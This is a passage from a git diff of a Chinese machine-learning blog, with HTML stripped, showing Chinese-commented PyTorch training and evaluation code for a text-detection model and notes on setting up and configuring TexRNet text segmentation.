      # 这段代码定义了 _train_epoch 方法,用于训练模型一个训练周期(epoch)。
      def _train_epoch(self, epoch):
      # 模型训练模式:调用 self.model.train() 设置模型为训练模式。
      self.model.train()
      # 时间记录:记录周期和批次的开始时间。
      epoch_start = time.time()
      batch_start = time.time()
      train_loss = 0.
      running_metric_text = runningScore(2)
      # 初始化:初始化累计损失 train_loss 和运行中的指标 running_metric_text,并获取当前学习率 lr。
      lr = self.optimizer.param_groups[0]['lr']

      # 遍历数据:遍历训练数据加载器中的每个批次:
      for i, batch in enumerate(self.train_loader):
      if i >= self.train_loader_len:
      break
      self.global_step += 1
      lr = self.optimizer.param_groups[0]['lr']

      # 数据进行转换和丢到 gpu
      # 将数据移动到 GPU 上。
      for key, value in batch.items():
      if value is not None:
      if isinstance(value, torch.Tensor):
      batch[key] = value.to(self.device)
      cur_batch_size = batch['img'].size()[0]

      # 通过模型生成预测 preds。
      preds = self.model(batch['img'])
      # 计算损失 loss_dict,并执行反向传播和优化步骤。
      loss_dict = self.criterion(preds, batch)
      # backward
      self.optimizer.zero_grad()
      loss_dict['loss'].backward()
      self.optimizer.step()
      # 如果使用了 WarmupPolyLR,更新学习率调度器。
      if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
      self.scheduler.step()
      # acc iou
      # 计算指标 score_shrink_map,并记录损失和准确度信息。
      score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
      thred=self.config['post_processing']['args']['thresh'])

      # loss 和 acc 记录到日志
      # 日志记录:将损失和各个指标记录为字符串 loss_str,并累加到总训练损失 train_loss。
      loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
      for idx, (key, value) in enumerate(loss_dict.items()):
      loss_dict[key] = value.item()
      if key == 'loss':
      continue
      loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
      if idx < len(loss_dict) - 1:
      loss_str += ', '

      train_loss += loss_dict['loss']
      acc = score_shrink_map['Mean Acc']
      iou_shrink_map = score_shrink_map['Mean IoU']

      # 条件:每隔 log_iter 步记录一次日志。
      # 指标:计算每秒处理样本的速度,并记录准确率、IoU、损失和学习率。
      # 日志记录:使用 self.logger_info 输出这些指标,以便监控训练过程。
      if self.global_step % self.log_iter == 0:
      batch_time = time.time() - batch_start
      self.logger_info(
      '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
      epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
      iou_shrink_map, loss_str, lr, batch_time))
      batch_start = time.time()

      # 条件:如果启用了 TensorBoard,则写入日志。
      # 损失和指标:将各种训练指标和损失记录到 TensorBoard 中以便可视化。
      if self.tensorboard_enable and self.config['local_rank'] == 0:
      # write tensorboard
      for key, value in loss_dict.items():
      self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
      self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
      self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
      self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
      # 图像可视化:条件:每隔 show_images_iter 步可视化一次图像。
      # 图像和标签:将原始图像、真实标签和模型预测结果添加到 TensorBoard 中。
      # 可视化:使用 vutils.make_grid 创建图像网格以便更好地可视化。
      if self.global_step % self.show_images_iter == 0:
      # show images on tensorboard
      self.inverse_normalize(batch['img'])
      self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
      # shrink_labels and threshold_labels
      shrink_labels = batch['shrink_map']
      threshold_labels = batch['threshold_map']
      shrink_labels[shrink_labels <= 0.5] = 0
      shrink_labels[shrink_labels > 0.5] = 1
      show_label = torch.cat([shrink_labels, threshold_labels])
      show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
      self.writer.add_image('TRAIN/gt', show_label, self.global_step)
      # model output
      show_pred = []
      for kk in range(preds.shape[1]):
      show_pred.append(preds[:, kk, :, :])
      show_pred = torch.cat(show_pred)
      show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
      self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
      # 总结:返回一个包含每个 epoch 的平均训练损失、学习率、总时间和 epoch 编号的字典。
      return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
      'epoch': epoch}

      def _eval(self, epoch):
      # 这将影响模型的行为,比如在评估时关闭 dropout 和 batch normalization。
      self.model.eval()
      # torch.cuda.empty_cache() # speed up evaluating after training finished
      # raw_metrics 用来存储每个批次的评估指标,total_frame 用来记录总的处理帧数,total_time 记录总的处理时间。
      raw_metrics = []
      total_frame = 0.0
      total_time = 0.0
      for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
      # 关闭梯度计算:这用于避免计算梯度,从而减少内存使用和加快计算速度。
      with torch.no_grad():
      # 数据进行转换和丢到gpu
      for key, value in batch.items():
      if value is not None:
      if isinstance(value, torch.Tensor):
      batch[key] = value.to(self.device)
      # 记录开始时间并进行预测:
      start = time.time()
      preds = self.model(batch['img'])
      # 对预测结果进行后处理:
      boxes, scores = self.post_process(batch, preds,is_output_polygon=self.metric_cls.is_output_polygon)
      # 更新统计数据:
      total_frame += batch['img'].size()[0]
      total_time += time.time() - start
      # 计算并记录评估指标:
      raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
      raw_metrics.append(raw_metric)
      # 汇总指标:
      metrics = self.metric_cls.gather_measure(raw_metrics)
      # 记录每秒帧数(FPS):
      self.logger_info('FPS:{}'.format(total_frame / total_time))
      # 返回指标:
      return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

      def _on_epoch_finish(self):
      # 这个方法在每个训练周期结束时执行,执行以下操作:
      # 记录当前训练周期的信息:
      self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
      self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
      self.epoch_result['lr']))
      # 保存模型检查点:
      net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
      net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

      # 如果是主进程:
      if self.config['local_rank'] == 0:
      # 保存当前模型检查点:
      self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
      save_best = False
      if self.validate_loader is not None and self.metric_cls is not None: # 使用 f1 作为最优模型指标
      # 评估模型性能(如果有验证集和指标类):
      recall, precision, hmean = self._eval(self.epoch_result['epoch'])

      # 记录评估指标到 TensorBoard(如果启用):
      if self.tensorboard_enable:
      self.writer.add_scalar('EVAL/recall', recall, self.global_step)
      self.writer.add_scalar('EVAL/precision', precision, self.global_step)
      self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
      self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

      # 根据 F1 分数或训练损失判断是否保存最佳模型:
      if hmean >= self.metrics['hmean']:
      save_best = True
      self.metrics['train_loss'] = self.epoch_result['train_loss']
      self.metrics['hmean'] = hmean
      self.metrics['precision'] = precision
      self.metrics['recall'] = recall
      self.metrics['best_model_epoch'] = self.epoch_result['epoch']
      else:
      if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
      save_best = True
      self.metrics['train_loss'] = self.epoch_result['train_loss']
      self.metrics['best_model_epoch'] = self.epoch_result['epoch']
      # 记录最佳模型的信息并保存最佳模型:
      best_str = 'current best, '
      for k, v in self.metrics.items():
      best_str += '{}: {:.6f}, '.format(k, v)
      self.logger_info(best_str)
      if save_best:
      import shutil
      shutil.copy(net_save_path, net_save_path_best)
      self.logger_info("Saving current best: {}".format(net_save_path_best))
      else:
      self.logger_info("Saving checkpoint: {}".format(net_save_path))


      def _on_train_finish(self):
      # 这个方法在训练完成时执行,执行以下操作:
      # 记录所有指标信息:
      for k, v in self.metrics.items():
      self.logger_info('{}:{}'.format(k, v))
      # 记录训练完成的信息:
      self.logger_info('finish train')

      SynthText 是一个由 800k 张图像组成的合成数据集。这些图像是从 8k 个背景图像合成的。此数据集仅用于预训练我们的模型。

      ​ 训练数据的数据扩充包括:

        @@ -899,6 +897,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Resolution-robust Large Mask Inpainting with Fourier Convolutions/index.html b/posts/Paper-Resolution-robust Large Mask Inpainting with Fourier Convolutions/index.html index ecd816dfb9..9c2d841969 100644 --- a/posts/Paper-Resolution-robust Large Mask Inpainting with Fourier Convolutions/index.html +++ b/posts/Paper-Resolution-robust Large Mask Inpainting with Fourier Convolutions/index.html @@ -44,8 +44,6 @@ - - @@ -698,6 +696,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-Rethinking Text Segmentation\357\274\232A Novel Dataset and A Text-Specific Refinement Approach/index.html" "b/posts/Paper-Rethinking Text Segmentation\357\274\232A Novel Dataset and A Text-Specific Refinement Approach/index.html" index 549b1c05a8..8a71eaa83e 100644 --- "a/posts/Paper-Rethinking Text Segmentation\357\274\232A Novel Dataset and A Text-Specific Refinement Approach/index.html" +++ "b/posts/Paper-Rethinking Text Segmentation\357\274\232A Novel Dataset and A Text-Specific Refinement Approach/index.html" @@ -44,8 +44,6 @@ - - @@ -626,8 +624,8 @@

        配置

        1. 新建一个 conda 环境:
        -
        conda create -n texrnet python=3.7
        -
        conda activate texrnet
        +
        1
        conda create -n texrnet python=3.7
        +
        1
        conda activate texrnet
        1. 使用离线安装方式安装 pytorch(被坑了 n 次逐渐熟练了 orz,还是离线安装的方式好使),从 download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision
        @@ -637,8 +635,8 @@

        配置

        不知道为什么今天 edge 下载得特别慢,用迅雷了。

        png

        -
        pip install torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
        -
        pip install torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
        +
        1
        pip install torch-1.13.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
        +
        1
        pip install torchvision-0.14.1+cu117-cp37-cp37m-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

        png

        1. @@ -648,7 +646,7 @@

          配置

          在仓库目录下,将 requirement.txt 里的 torch==1.6torchvision==0.7 删掉,然后执行:

        -
        pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
        +
        1
        pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
        1. 在仓库目录下,新建好下列文件夹:
        @@ -694,7 +692,7 @@

        训练

      png

      我说婷婷!在 train_utils.py 里把 cfg.DATA.NUM_WORKERS_PER_GPU 调小就又可以跑了!

      -
      if not cfg.DEBUG:
      cfg.DATA.NUM_WORKERS_PER_GPU = 2
      cfg.TRAIN.BATCH_SIZE_PER_GPU = 2
      cfg.TRAIN.OPTIM_MANAGER_LRSCALE = {
      'hrnet':1, 'texrnet': 10}
      return cfg
      +
      1
      2
      3
      4
      5
      6
      if not cfg.DEBUG:
      cfg.DATA.NUM_WORKERS_PER_GPU = 2
      cfg.TRAIN.BATCH_SIZE_PER_GPU = 2
      cfg.TRAIN.OPTIM_MANAGER_LRSCALE = {
      'hrnet':1, 'texrnet': 10}
      return cfg

      好吧还是跑不了,giao! File “D:\Study\XXXXX\Rethinking-Text-Segmentation\lib\torchutils.py”, line 262, in _call_
      return y
      UnboundLocalError: local variable ‘y’ referenced before assignment

      @@ -772,9 +770,9 @@

      istrain = not args.eval,如果不开启 eval 模式,那就是开启 train 模式。

      -
      # 设置训练模式
      if istrain:
      cfg = copy.deepcopy(cfg_train)
      else:
      cfg = copy.deepcopy(cfg_test)

      if istrain:
      # 运行在训练模式下,则调用 get_experiment_id()函数获取一个新的实验 ID,并将其赋值给 cfg.EXPERIMENT_ID。
      # 每次运行程序时,都会产生一个新的实验 ID,以便在训练多个模型时能够区分它们之间的差异
      cfg.EXPERIMENT_ID = get_experiment_id()
      else:
      # 表示当前不处于任何实验中
      cfg.EXPERIMENT_ID = None

      # 设置数据集
      if args.dsname == "textseg":
      cfg_data = cfg_textseg
      elif args.dsname == "cocots":
      cfg_data = cfg_cocots
      elif args.dsname == "mlt":
      cfg_data = cfg_mlt
      elif args.dsname == "icdar13":
      cfg_data = cfg_icdar13
      elif args.dsname == "totaltext":
      cfg_data = cfg_totaltext
      else:
      raise ValueError

      cfg.DEBUG = args.debug
      cfg.DIST_URL = 'tcp://127.0.0.1:{}'.format(args.port)
      if args.gpu is None:
      # 如果不设置 GPU,就都用了
      cfg.GPU_DEVICE = 'all'
      else:
      # 使用指定的 GPU
      cfg.GPU_DEVICE = args.gpu

      # 加载模型和数据
      cfg.MODEL = copy.deepcopy(cfg_mdel)
      cfg.DATA = copy.deepcopy(cfg_data)

      if istrain:
      cfg = set_cfg_train(cfg, dsname=args.dsname)
      if args.hrnet:
      # 调用 set_cfg_hrnetw48_train 函数对 HRNet-W48 模型进行配置
      cfg = set_cfg_hrnetw48_train(cfg)
      else:
      cfg = set_cfg_eval(cfg, dsname=args.dsname)
      if args.hrnet:
      cfg = set_cfg_hrnetw48_eval(cfg)
      # 加载预训练模型
      cfg.MODEL.TEXRNET.PRETRAINED_PTH = args.pth

      # 设置数据集模式
      if istrain:
      if args.dsname == "textseg":
      cfg.DATA.DATASET_MODE = 'train+val'
      elif args.dsname == "cocots":
      cfg.DATA.DATASET_MODE = 'train'
      elif args.dsname == "mlt":
      cfg.DATA.DATASET_MODE = 'trainseg'
      elif args.dsname == "icdar13":
      cfg.DATA.DATASET_MODE = 'train_fst'
      elif args.dsname == "totaltext":
      cfg.DATA.DATASET_MODE = 'train'
      else:
      raise ValueError
      else:
      if args.dsname == "textseg":
      cfg.DATA.DATASET_MODE = 'test'
      elif args.dsname == "cocots":
      cfg.DATA.DATASET_MODE = 'val'
      elif args.dsname == "mlt":
      cfg.DATA.DATASET_MODE = 'valseg'
      elif args.dsname == "icdar13":
      cfg.DATA.DATASET_MODE = 'test_fst'
      elif args.dsname == "totaltext":
      cfg.DATA.DATASET_MODE = 'test'
      else:
      raise ValueError

      if istrain:
      if args.trainwithcls: # 启动分布式训练
      if args.dsname == 'textseg': # 数据集
      cfg.DATA.LOADER_PIPELINE = [
      'NumpyImageLoader', # 使用 numpy 模块读取图像数据
      'TextSeg_SeglabelLoader', # 加载文本区域分割标签数据
      'CharBboxSpLoader',] # 加载字符边界框数据。这些数据都是用于文本检测或分割任务的
      cfg.DATA.RANDOM_RESIZE_CROP_SIZE = [32, 32] # 随机裁剪的尺寸
      cfg.DATA.RANDOM_RESIZE_CROP_SCALE = [0.8, 1.2] # 缩放比例
      cfg.DATA.RANDOM_RESIZE_CROP_RATIO = [3/4, 4/3] # 宽高比范围
      cfg.DATA.TRANS_PIPELINE = [
      'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
      'TextSeg_RandomResizeCropCharBbox', # 对文本区域分割标签和字符边界框等数据进行随机尺度变换和裁剪操作,以增强模型鲁棒性
      'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
      'Normalize', # 进行零均值和单位方差的标准化处理
      'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
      'RandomCrop', # 对图像数据进行随机裁剪操作
      ]
      elif args.dsname == 'icdar13':
      cfg.DATA.LOADER_PIPELINE = [
      'NumpyImageLoader', # 使用 numpy 模块读取图像数据
      'SeglabelLoader', # 加载文本区域分割标签数据
      'CharBboxSpLoader',] # 加载字符边界框数据
      cfg.DATA.TRANS_PIPELINE = [
      'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
      'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
      'Normalize', # 进行零均值和单位方差的标准化处理
      'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
      'RandomCrop', # 对图像数据进行随机裁剪操作
      ]
      else:
      raise ValueError
      # 将文本数据格式化为文本区域和字符边界框标签,以便进行检测和识别任务的训练
      cfg.DATA.FORMATTER = 'SemChinsChbbxFormatter'
      # 用于将字符边界框转化成方形,以方便进行 RoI 池化
      cfg.DATA.LOADER_SQUARE_BBOX = True
      # 表示随机裁剪操作从哪个阶段开始,这里设为'sem'即从语义分割的阶段开始
      cfg.DATA.RANDOM_RESIZE_CROP_FROM = 'sem'
      # 表示网络在训练过程中从哪个阶段进行预测得到输出结果,这里设为'sem'也是从语义分割的阶段开始
      cfg.MODEL.TEXRNET.INTRAIN_GETPRED_FROM = 'sem'
      # the one with 93.98% and trained on semantic crops
      # 分类器的预训练模型路径
      cfg.TRAIN.CLASSIFIER_PATH = osp.join(
      'pretrained', 'init', 'resnet50_textcls.pth',
      )
      # RoI 池化时边界框的扩充方式,这里采用 semcrop
      cfg.TRAIN.ROI_BBOX_PADDING_TYPE = 'semcrop'
      # RoI 池化后的图像大小
      cfg.TRAIN.ROI_ALIGN_SIZE = [32, 32]
      # 是否对分类器进行更新
      cfg.TRAIN.UPDATE_CLASSIFIER = False
      # 在训练过程中从语义分割的阶段开始多少次迭代后激活分类器的训练
      cfg.TRAIN.ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER = 0
      # 各个损失函数的权重,包括语义分割的损失、RFN 的损失、RFNtri 的损失和分类器的损失
      cfg.TRAIN.LOSS_WEIGHT = {
      'losssem' : 1,
      'lossrfn' : 0.5,
      'lossrfntri': 0.5,
      'losscls' : 0.1,
      }

      if istrain:
      # 是否采用 HRNet 作为语义分割网络模型,如果不采用,就用 deeplab
      if args.hrnet:
      cfg.TRAIN.SIGNATURE = ['texrnet', 'hrnet']
      else:
      cfg.TRAIN.SIGNATURE = ['texrnet', 'deeplab']
      # 'LOG_DIR':日志文件所在目录,如果是训练模式则创建一个新的实验文件夹,并将日志文件保存在该目录下的'train.log'中
      cfg.LOG_DIR = experiment_folder(cfg, isnew=True, sig=cfg.TRAIN.SIGNATURE)
      cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'train.log')
      else:
      # 如果是评估模式则将日志文件保存在'eval.log'中
      cfg.LOG_DIR = osp.join(cfg.MISC_DIR, 'eval')
      cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'eval.log')
      cfg.TEST.SUB_DIR = None

      if cfg.DEBUG:
      # 如果开启了调试模式,则将实验 ID 设置为 999999999999,方便跟踪调试结果
      cfg.EXPERIMENT_ID = 999999999999
      # 每个 GPU 使用的数据加载器线程数
      cfg.DATA.NUM_WORKERS_PER_GPU = 0
      # 每个 GPU 使用的 batch size 大小
      cfg.TRAIN.BATCH_SIZE_PER_GPU = 2

      cfg = common_initiates(cfg) # 该函数用于加载训练和测试数据,并进行数据预处理、标准化等操作

      if istrain:
      if args.trainwithcls:
      # 执行训练操作的时间戳。如果使用分类器,则调用 ts_with_classifier()函数进行时间戳设置
      exec_ts = ts_with_classifier()
      else:
      # 调用 ts()函数进行时间戳设置
      exec_ts = ts()
      # 训练器对象
      trainer = train(cfg)
      # 向训练器对象注册不同的训练阶段,包括数据加载、前向传播、反向传播、参数更新等流程
      trainer.register_stage(exec_ts)

      # trainer(0)
      # 使用多进程方式进行训练,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速训练过程。
      # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
      mp.spawn(trainer,
      args=(),
      nprocs=cfg.GPU_COUNT,
      join=True)
      else:
      # 执行测试操作的时间戳
      exec_es = es()
      # 测试器对象
      tester = eval(cfg)
      # 向测试器对象注册不同的测试阶段,包括数据加载、前向传播、评估等流程
      tester.register_stage(exec_es)

      # tester(0)
      # 使用多进程方式进行测试,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速测试过程。
      # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
      mp.spawn(tester,
      args=(),
      nprocs=cfg.GPU_COUNT,
      join=True)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      85
      86
      87
      88
      89
      90
      91
      92
      93
      94
      95
      96
      97
      98
      99
      100
      101
      102
      103
      104
      105
      106
      107
      108
      109
      110
      111
      112
      113
      114
      115
      116
      117
      118
      119
      120
      121
      122
      123
      124
      125
      126
      127
      128
      129
      130
      131
      132
      133
      134
      135
      136
      137
      138
      139
      140
      141
      142
      143
      144
      145
      146
      147
      148
      149
      150
      151
      152
      153
      154
      155
      156
      157
      158
      159
      160
      161
      162
      163
      164
      165
      166
      167
      168
      169
      170
      171
      172
      173
      174
      175
      176
      177
      178
      179
      180
      181
      182
      183
      184
      185
      186
      187
      188
      189
      190
      191
      192
      193
      194
      195
      196
      197
      198
      199
      200
      201
      # 设置训练模式
      if istrain:
      cfg = copy.deepcopy(cfg_train)
      else:
      cfg = copy.deepcopy(cfg_test)

      if istrain:
      # 运行在训练模式下,则调用 get_experiment_id()函数获取一个新的实验 ID,并将其赋值给 cfg.EXPERIMENT_ID。
      # 每次运行程序时,都会产生一个新的实验 ID,以便在训练多个模型时能够区分它们之间的差异
      cfg.EXPERIMENT_ID = get_experiment_id()
      else:
      # 表示当前不处于任何实验中
      cfg.EXPERIMENT_ID = None

      # 设置数据集
      if args.dsname == "textseg":
      cfg_data = cfg_textseg
      elif args.dsname == "cocots":
      cfg_data = cfg_cocots
      elif args.dsname == "mlt":
      cfg_data = cfg_mlt
      elif args.dsname == "icdar13":
      cfg_data = cfg_icdar13
      elif args.dsname == "totaltext":
      cfg_data = cfg_totaltext
      else:
      raise ValueError

      cfg.DEBUG = args.debug
      cfg.DIST_URL = 'tcp://127.0.0.1:{}'.format(args.port)
      if args.gpu is None:
      # 如果不设置 GPU,就都用了
      cfg.GPU_DEVICE = 'all'
      else:
      # 使用指定的 GPU
      cfg.GPU_DEVICE = args.gpu

      # 加载模型和数据
      cfg.MODEL = copy.deepcopy(cfg_mdel)
      cfg.DATA = copy.deepcopy(cfg_data)

      if istrain:
      cfg = set_cfg_train(cfg, dsname=args.dsname)
      if args.hrnet:
      # 调用 set_cfg_hrnetw48_train 函数对 HRNet-W48 模型进行配置
      cfg = set_cfg_hrnetw48_train(cfg)
      else:
      cfg = set_cfg_eval(cfg, dsname=args.dsname)
      if args.hrnet:
      cfg = set_cfg_hrnetw48_eval(cfg)
      # 加载预训练模型
      cfg.MODEL.TEXRNET.PRETRAINED_PTH = args.pth

      # 设置数据集模式
      if istrain:
      if args.dsname == "textseg":
      cfg.DATA.DATASET_MODE = 'train+val'
      elif args.dsname == "cocots":
      cfg.DATA.DATASET_MODE = 'train'
      elif args.dsname == "mlt":
      cfg.DATA.DATASET_MODE = 'trainseg'
      elif args.dsname == "icdar13":
      cfg.DATA.DATASET_MODE = 'train_fst'
      elif args.dsname == "totaltext":
      cfg.DATA.DATASET_MODE = 'train'
      else:
      raise ValueError
      else:
      if args.dsname == "textseg":
      cfg.DATA.DATASET_MODE = 'test'
      elif args.dsname == "cocots":
      cfg.DATA.DATASET_MODE = 'val'
      elif args.dsname == "mlt":
      cfg.DATA.DATASET_MODE = 'valseg'
      elif args.dsname == "icdar13":
      cfg.DATA.DATASET_MODE = 'test_fst'
      elif args.dsname == "totaltext":
      cfg.DATA.DATASET_MODE = 'test'
      else:
      raise ValueError

      if istrain:
      if args.trainwithcls: # 启动分布式训练
      if args.dsname == 'textseg': # 数据集
      cfg.DATA.LOADER_PIPELINE = [
      'NumpyImageLoader', # 使用 numpy 模块读取图像数据
      'TextSeg_SeglabelLoader', # 加载文本区域分割标签数据
      'CharBboxSpLoader',] # 加载字符边界框数据。这些数据都是用于文本检测或分割任务的
      cfg.DATA.RANDOM_RESIZE_CROP_SIZE = [32, 32] # 随机裁剪的尺寸
      cfg.DATA.RANDOM_RESIZE_CROP_SCALE = [0.8, 1.2] # 缩放比例
      cfg.DATA.RANDOM_RESIZE_CROP_RATIO = [3/4, 4/3] # 宽高比范围
      cfg.DATA.TRANS_PIPELINE = [
      'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
      'TextSeg_RandomResizeCropCharBbox', # 对文本区域分割标签和字符边界框等数据进行随机尺度变换和裁剪操作,以增强模型鲁棒性
      'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
      'Normalize', # 进行零均值和单位方差的标准化处理
      'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
      'RandomCrop', # 对图像数据进行随机裁剪操作
      ]
      elif args.dsname == 'icdar13':
      cfg.DATA.LOADER_PIPELINE = [
      'NumpyImageLoader', # 使用 numpy 模块读取图像数据
      'SeglabelLoader', # 加载文本区域分割标签数据
      'CharBboxSpLoader',] # 加载字符边界框数据
      cfg.DATA.TRANS_PIPELINE = [
      'UniformNumpyType', # 将图像数据类型转换为相同的类型,以便进行后续的处理
      'NormalizeUint8ToZeroOne', # 将像素值范围从[0, 255]归一化到[0, 1]
      'Normalize', # 进行零均值和单位方差的标准化处理
      'RandomScaleOneSide', # 对图像数据进行单边缩放,以增加模型对图像尺度的鲁棒性
      'RandomCrop', # 对图像数据进行随机裁剪操作
      ]
      else:
      raise ValueError
      # 将文本数据格式化为文本区域和字符边界框标签,以便进行检测和识别任务的训练
      cfg.DATA.FORMATTER = 'SemChinsChbbxFormatter'
      # 用于将字符边界框转化成方形,以方便进行 RoI 池化
      cfg.DATA.LOADER_SQUARE_BBOX = True
      # 表示随机裁剪操作从哪个阶段开始,这里设为'sem'即从语义分割的阶段开始
      cfg.DATA.RANDOM_RESIZE_CROP_FROM = 'sem'
      # 表示网络在训练过程中从哪个阶段进行预测得到输出结果,这里设为'sem'也是从语义分割的阶段开始
      cfg.MODEL.TEXRNET.INTRAIN_GETPRED_FROM = 'sem'
      # the one with 93.98% and trained on semantic crops
      # 分类器的预训练模型路径
      cfg.TRAIN.CLASSIFIER_PATH = osp.join(
      'pretrained', 'init', 'resnet50_textcls.pth',
      )
      # RoI 池化时边界框的扩充方式,这里采用 semcrop
      cfg.TRAIN.ROI_BBOX_PADDING_TYPE = 'semcrop'
      # RoI 池化后的图像大小
      cfg.TRAIN.ROI_ALIGN_SIZE = [32, 32]
      # 是否对分类器进行更新
      cfg.TRAIN.UPDATE_CLASSIFIER = False
      # 在训练过程中从语义分割的阶段开始多少次迭代后激活分类器的训练
      cfg.TRAIN.ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER = 0
      # 各个损失函数的权重,包括语义分割的损失、RFN 的损失、RFNtri 的损失和分类器的损失
      cfg.TRAIN.LOSS_WEIGHT = {
      'losssem' : 1,
      'lossrfn' : 0.5,
      'lossrfntri': 0.5,
      'losscls' : 0.1,
      }

      if istrain:
      # 是否采用 HRNet 作为语义分割网络模型,如果不采用,就用 deeplab
      if args.hrnet:
      cfg.TRAIN.SIGNATURE = ['texrnet', 'hrnet']
      else:
      cfg.TRAIN.SIGNATURE = ['texrnet', 'deeplab']
      # 'LOG_DIR':日志文件所在目录,如果是训练模式则创建一个新的实验文件夹,并将日志文件保存在该目录下的'train.log'中
      cfg.LOG_DIR = experiment_folder(cfg, isnew=True, sig=cfg.TRAIN.SIGNATURE)
      cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'train.log')
      else:
      # 如果是评估模式则将日志文件保存在'eval.log'中
      cfg.LOG_DIR = osp.join(cfg.MISC_DIR, 'eval')
      cfg.LOG_FILE = osp.join(cfg.LOG_DIR, 'eval.log')
      cfg.TEST.SUB_DIR = None

      if cfg.DEBUG:
      # 如果开启了调试模式,则将实验 ID 设置为 999999999999,方便跟踪调试结果
      cfg.EXPERIMENT_ID = 999999999999
      # 每个 GPU 使用的数据加载器线程数
      cfg.DATA.NUM_WORKERS_PER_GPU = 0
      # 每个 GPU 使用的 batch size 大小
      cfg.TRAIN.BATCH_SIZE_PER_GPU = 2

      cfg = common_initiates(cfg) # 该函数用于加载训练和测试数据,并进行数据预处理、标准化等操作

      if istrain:
      if args.trainwithcls:
      # 执行训练操作的时间戳。如果使用分类器,则调用 ts_with_classifier()函数进行时间戳设置
      exec_ts = ts_with_classifier()
      else:
      # 调用 ts()函数进行时间戳设置
      exec_ts = ts()
      # 训练器对象
      trainer = train(cfg)
      # 向训练器对象注册不同的训练阶段,包括数据加载、前向传播、反向传播、参数更新等流程
      trainer.register_stage(exec_ts)

      # trainer(0)
      # 使用多进程方式进行训练,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速训练过程。
      # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
      mp.spawn(trainer,
      args=(),
      nprocs=cfg.GPU_COUNT,
      join=True)
      else:
      # 执行测试操作的时间戳
      exec_es = es()
      # 测试器对象
      tester = eval(cfg)
      # 向测试器对象注册不同的测试阶段,包括数据加载、前向传播、评估等流程
      tester.register_stage(exec_es)

      # tester(0)
